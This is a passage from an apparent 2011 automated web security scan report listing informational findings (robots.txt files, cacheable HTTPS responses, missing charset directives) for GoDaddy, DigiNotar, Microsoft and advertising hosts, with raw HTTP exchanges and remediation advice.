Date: Sat, 03 Sep 2011 21:49:59 GMT
Connection: close

User-agent: *
Disallow: /

24.14. http://imagesak.securepaynet.net/assets/godaddy.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imagesak.securepaynet.net
Path:	/assets/godaddy.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imagesak.securepaynet.net

Response

HTTP/1.0 200 OK
Content-Length: 50
Content-Type: text/plain
Last-Modified: Thu, 04 Jun 2009 15:02:03 GMT
Accept-Ranges: bytes
ETag: "1eb1456b25e5c91:be1"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3888000
Date: Sat, 03 Sep 2011 21:46:20 GMT
Connection: close

#
# robots.txt
#
User-agent: *
Disallow: /
#

24.15. http://img.godaddy.com/image.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.godaddy.com
Path:	/image.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Tue, 25 Nov 2008 19:40:48 GMT
Accept-Ranges: bytes
ETag: "d53d3eb7354fc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sat, 03 Sep 2011 21:30:20 GMT
Connection: close
Content-Length: 53

# img.* robots.txt file
User-agent: *
Disallow: /

24.16. http://img1.wsimg.com/assets/godaddy.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img1.wsimg.com
Path:	/assets/godaddy.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img1.wsimg.com

Response

HTTP/1.0 200 OK
Content-Length: 50
Content-Type: text/plain
Last-Modified: Thu, 04 Jun 2009 15:02:03 GMT
Accept-Ranges: bytes
ETag: "1eb1456b25e5c91:1072"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3888000
Date: Sat, 03 Sep 2011 21:30:11 GMT
Connection: close

#
# robots.txt
#
User-agent: *
Disallow: /
#

24.17. http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img3.wsimg.com
Path:	/fastball/js_lib/FastballLibrary0006.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img3.wsimg.com

Response

HTTP/1.0 200 OK
Content-Length: 50
Content-Type: text/plain
Last-Modified: Thu, 04 Jun 2009 15:02:03 GMT
Accept-Ranges: bytes
ETag: "1eb1456b25e5c91:1072"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3888000
Date: Sat, 03 Sep 2011 21:28:59 GMT
Connection: close

#
# robots.txt
#
User-agent: *
Disallow: /
#

24.18. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2
X-Name: dmc-s09
Last-Modified: Tue, 08 Sep 2009 04:16:43 GMT
ETag: "8d60065-a2-473093bdbc0c0"
Accept-Ranges: bytes
Content-Length: 162
Connection: close
Content-Type: text/plain

#do not edit this file in ms-platform, you need unix line seperators for it.
#this file will disallow any robots to search the dmc.
User-Agent: *
Disallow: /

24.19. https://mya.godaddy.com/products/accountlist.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mya.godaddy.com
Path:	/products/accountlist.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mya.godaddy.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Last-Modified: Mon, 31 Aug 2009 22:39:02 GMT
Accept-Ranges: bytes
ETag: "c9bf88d68b2aca1:601"
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:26:13 GMT
Connection: close

User-agent: *
Disallow: /

24.20. http://pagead2.googlesyndication.com/pagead/imgad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 03 Sep 2011 23:04:50 GMT
Expires: Sun, 04 Sep 2011 23:04:50 GMT
Cache-Control: public, max-age=86400
Server: cafe
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

24.21. http://pixel.adblade.com/imps.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.adblade.com
Path:	/imps.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.adblade.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "2884875378"
Last-Modified: Fri, 21 Aug 2009 13:46:26 GMT
Content-Length: 28
Connection: close
Date: Sat, 03 Sep 2011 21:40:33 GMT
Server: lighttpd/1.4.21

User-agent: *
Disallow: /

24.22. http://registercom.tt.omtrdc.net/m2/registercom/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://registercom.tt.omtrdc.net
Path:	/m2/registercom/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: registercom.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Sat, 03 Sep 2011 21:32:02 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

24.23. http://rss2search.com/delivery/ti.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rss2search.com
Path:	/delivery/ti.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rss2search.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sat, 03 Sep 2011 21:57:25 GMT
Content-Type: text/plain
Content-Length: 35
Last-Modified: Fri, 03 Dec 2010 18:15:05 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Accept-Ranges: bytes

User-agent: *
Disallow: /delivery/

24.24. http://s.gravatar.com/js/gprofiles.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.gravatar.com
Path:	/js/gprofiles.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 03 Sep 2011 21:33:54 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (sjo/5238)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr

24.25. http://segment-pixel.invitemedia.com/set_partner_uid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/set_partner_uid

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 03 Sep 2011 17:32:23 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

24.26. http://themes.googleusercontent.com/static/fonts/droidsans/v1/EFpQQyG9GqCrobXxL-KRMQFhaRv2pGgT5Kf0An0s4MM.woff previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://themes.googleusercontent.com
Path:	/static/fonts/droidsans/v1/EFpQQyG9GqCrobXxL-KRMQFhaRv2pGgT5Kf0An0s4MM.woff

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 03 Sep 2011 21:34:41 GMT
Expires: Sat, 03 Sep 2011 21:34:41 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

24.27. http://value.register.com/b/ss/registerwww-production/1/H.20.3/s74702994271647 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://value.register.com
Path:	/b/ss/registerwww-production/1/H.20.3/s74702994271647

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: value.register.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:57 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "30c2b1-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www376
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

24.28. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapssls.com
Path:	/geotrust-ssl-certificates/quickssl-premium.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cheapssls.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 15 Feb 2011 04:00:44 GMT
Accept-Ranges: bytes
ETag: "0fe16ebc4cccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:33:17 GMT
Connection: close
Content-Length: 210

User-agent: *
Disallow: /images/thumbnails/
Disallow: /skins/
Disallow: /payments/
Disallow: /store_closed.html
Disallow: /core/
Disallow: /lib/
Disallow: /install/
Disallow: /js/
Disallow: /
...[SNIP]...

24.29. https://www.cheapssls.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cheapssls.com
Path:	/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cheapssls.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 15 Feb 2011 04:00:44 GMT
Accept-Ranges: bytes
ETag: "0fe16ebc4cccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:44:36 GMT
Connection: close
Content-Length: 210

User-agent: *
Disallow: /images/thumbnails/
Disallow: /skins/
Disallow: /payments/
Disallow: /store_closed.html
Disallow: /core/
Disallow: /lib/
Disallow: /install/
Disallow: /js/
Disallow: /
...[SNIP]...

24.30. http://www.digicert.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.digicert.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.digicert.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Sep 2011 21:29:35 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 19 Aug 2010 01:25:36 GMT
ETag: "3f-48e230f262400"
Accept-Ranges: bytes
Content-Length: 63
Vary: Accept-Encoding
P3P: CP="ALL DSP COR CUR DEV PSA CONi OUR BUS PHY ONL PUR COM STA", policyref="http://www.digicert.com/w3c/p3p.xml"

User-agent: *
Disallow: /custsupport/
Disallow: /help/ssl_check

24.31. http://www.godaddy.com/SSL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/SSL

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:30:14 GMT
Connection: close
Content-Length: 718

#
# robots.txt
#
User-agent: Googlebot
Disallow: /about/godaddy-chinese.aspx
Disallow: /app
Disallow: /imag
Disallow: /out
Disallow: /gdshop/app
Disallow: /gdshop/clo
Disallow: /gdshop/con
Disallow: /
...[SNIP]...

24.32. https://www.godaddy.com/gdshop/xt_orderform_addmany.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/xt_orderform_addmany.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:47:31 GMT
Connection: close
Content-Length: 718

#
# robots.txt
#
User-agent: Googlebot
Disallow: /about/godaddy-chinese.aspx
Disallow: /app
Disallow: /imag
Disallow: /out
Disallow: /gdshop/app
Disallow: /gdshop/clo
Disallow: /gdshop/con
Disallow: /
...[SNIP]...

24.33. http://www.googleadservices.com/pagead/conversion/1051291126/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1051291126/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sat, 03 Sep 2011 21:29:13 GMT
Expires: Sat, 03 Sep 2011 21:29:13 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

24.34. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hostnj.net
Path:	/products-page/ssl-security/comodo-intranet-ssl-certificate/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hostnj.net

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.hostnj.net/xmlrpc.php
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:32:16 GMT
Connection: close
Content-Length: 71

User-agent: *
Disallow:

Sitemap: http://www.hostnj.net/sitemap.xml.gz

24.35. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microcad.ca
Path:	/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.microcad.ca

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:26:38 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 28 Jul 2011 01:26:35 GMT
ETag: "6c182a-9a-4a9170e45f71e"
Accept-Ranges: none
Content-Length: 154
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /orders
Disallow: /addressbook
Disallow: /account/profile
Disallow: /cart
Disallow: /checkout
Disallow: /rma
Disallow: /*&noidx=1*

24.36. https://www.microcad.ca/checkout/address previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microcad.ca
Path:	/checkout/address

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.microcad.ca

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:35:23 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 28 Jul 2011 01:26:35 GMT
ETag: "6c182a-9a-4a9170e45f71e"
Accept-Ranges: bytes
Content-Length: 154
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /orders
Disallow: /addressbook
Disallow: /account/profile
Disallow: /cart
Disallow: /checkout
Disallow: /rma
Disallow: /*&noidx=1*

24.37. http://www.shrinktheweb.com/scripts/pagepix.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shrinktheweb.com
Path:	/scripts/pagepix.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shrinktheweb.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:33:16 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 03 Jan 2011 22:07:38 GMT
ETag: "b50003-69d-498f86143fe80"
Accept-Ranges: bytes
Content-Length: 1693
Cache-Control: max-age=1209600
Expires: Sat, 17 Sep 2011 21:33:16 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

24.38. https://www.sslmatrix.com/ssl-promotion-code previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/ssl-promotion-code

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sslmatrix.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 22 Apr 2011 04:42:48 GMT
Accept-Ranges: bytes
ETag: "bb68d9baa70cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:44:11 GMT
Connection: close
Content-Length: 95

User-Agent: *
Allow: /
Disallow: /Services/
SITEMAP: https://www.sslmatrix.com/sitemap.xml

24.39. http://www.wunderground.com/dotset.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/dotset.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:40:30 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Wed, 02 Mar 2011 19:26:02 GMT
Accept-Ranges: bytes
Content-Length: 27683
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /AS5000/
Disallow: /history/
Disallow: /geo/
Disallow: /ndfdimagery/
Disallow: /weatherstation/
Disallow: /auto/927/weatherstation/
Disallow: /auto/1000tourtemplate/weatherstat
...[SNIP]...

24.40. http://www.youtube-nocookie.com/gen_204 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube-nocookie.com
Path:	/gen_204

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube-nocookie.com

Response

HTTP/1.0 200 OK
Date: Sat, 03 Sep 2011 17:32:21 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 18:22:34 GMT
ETag: "21b-4abe5541eae80"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

25. Cacheable HTTPS response previous next
There are 15 instances of this issue:

https://careers.microsoft.com/Resumes.aspx
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/retrieveaccount.aspx
https://onlineaanvraag.diginotar.nl/Digiforms/FormDesigner.aspx
https://support.microsoft.com/contactus/emailcontact.aspx
https://www.diginotar.com/Branchsolutions/tabid/857/Default.aspx
https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx
https://www.microsoft-careers.com/
https://www.microsoft-careers.com/content/corporate-research/
https://www.microsoft-careers.com/find.job
https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/
https://www.microsoft-careers.com/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/
https://www.sslmatrix.com/Order/quickorder
https://www.sslmatrix.com/ssl-promotion-code
https://www.sslmatrix.com/ssl-promotion-code/ssl-price

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

25.1. https://careers.microsoft.com/Resumes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://careers.microsoft.com
Path:	/Resumes.aspx

Request

GET /Resumes.aspx HTTP/1.1
Host: careers.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.2. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Request

Response

25.3. https://idp.godaddy.com/retrieveaccount.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/retrieveaccount.aspx

Request

Response

25.4. https://onlineaanvraag.diginotar.nl/Digiforms/FormDesigner.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineaanvraag.diginotar.nl
Path:	/Digiforms/FormDesigner.aspx

Request

GET /Digiforms/FormDesigner.aspx HTTP/1.1
Host: onlineaanvraag.diginotar.nl
Connection: keep-alive
Referer: http://www.diginotar.com/Products/ExtendedValidationSSL/tabid/622/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vxf1nkmhlaurworuh4lsmves

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 17:37:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xht
...[SNIP]...

25.5. https://support.microsoft.com/contactus/emailcontact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.microsoft.com
Path:	/contactus/emailcontact.aspx

Request

Response

25.6. https://www.diginotar.com/Branchsolutions/tabid/857/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.diginotar.com
Path:	/Branchsolutions/tabid/857/Default.aspx

Request

GET /Branchsolutions/tabid/857/Default.aspx HTTP/1.1
Host: www.diginotar.com
Connection: keep-alive
Referer: https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; DNNSTUFF_Aggregator=4854=1; __utma=243368080.1326588329.1315071214.1315071214.1315071214.1; __utmb=243368080.6.10.1315071214; __utmc=243368080; __utmz=243368080.1315071214.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=DigiNotar; language=en-US

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 17:38:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Refresh: 0;URL=http://www.diginotar.com/Branchsolutions/tabid/857/Default.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 192

<html><head><title></title></head><body></body></html>

25.7. https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.diginotar.com
Path:	/Home/Contact/tabid/2506/Default.aspx

Request

Response

25.8. https://www.microsoft-careers.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/

Request

Response

25.9. https://www.microsoft-careers.com/content/corporate-research/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/content/corporate-research/

Request

Response

25.10. https://www.microsoft-careers.com/find.job previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/find.job

Request

Response

25.11. https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/go/Microsoft-Research-Jobs/217358/

Request

Response

25.12. https://www.microsoft-careers.com/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/

Request

Response

25.13. https://www.sslmatrix.com/Order/quickorder previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/Order/quickorder

Request

Response

25.14. https://www.sslmatrix.com/ssl-promotion-code previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/ssl-promotion-code

Request

Response

25.15. https://www.sslmatrix.com/ssl-promotion-code/ssl-price previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/ssl-promotion-code/ssl-price

Request

Response

26. HTML does not specify charset previous next
There are 27 instances of this issue:

http://d3.zedo.com/jsc/d3/bh.html
http://ds.addthis.com/red/psi/sites/vasco.com/p.json
http://mediacdn.disqus.com/1314991730/build/system/def.html
http://mediacdn.disqus.com/1314991730/build/system/reply.html
http://mediacdn.disqus.com/1314991730/build/system/upload.html
http://now.eloqua.com/visitor/v200/svrGP.aspx
https://onlineaanvraag.diginotar.nl/
http://research.microsoft.com/apps/dp/h.htm
http://research.microsoft.com/en-us/um/people/chengh/measure.html
http://research.microsoft.com/en-us/um/people/chengh/measurev2.html
http://research.microsoft.com/en-us/um/people/darkok/
http://research.microsoft.com/en-us/um/people/dbwilson/
http://research.microsoft.com/en-us/um/people/horvitz/
http://research.microsoft.com/en-us/um/people/lamport/
http://research.microsoft.com/en-us/um/people/livshits/papers/abstracts/usenixsec11b.abstract.html
http://research.microsoft.com/en-us/um/people/ratul/
http://research.microsoft.com/en-us/um/people/schramm/memorial/
http://research.microsoft.com/en-us/um/people/simonpj/haskell98-revised/haskell98-report-html/list.html
http://research.microsoft.com/en-us/um/people/simonpj/haskell98-revised/haskell98-report-html/standard-prelude.html
http://research.microsoft.com/en-us/um/people/ssaponas/
http://research.microsoft.com/en-us/um/people/yongrui/
http://research.microsoft.com/en-us/um/redmond/projects/invisible/src/drivers/net/packet/lib/i386/VMNetsrv.msi.htm
http://research.microsoft.com/en-us/um/redmond/projects/invisible/src/drivers/net/packet/lib/i386/obsolete/VMNetSrv.msi.htm
http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
http://www.godaddy.com/sso/keepalive.aspx
http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/index.php
https://www.sslmatrix.com/favicon.ico

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

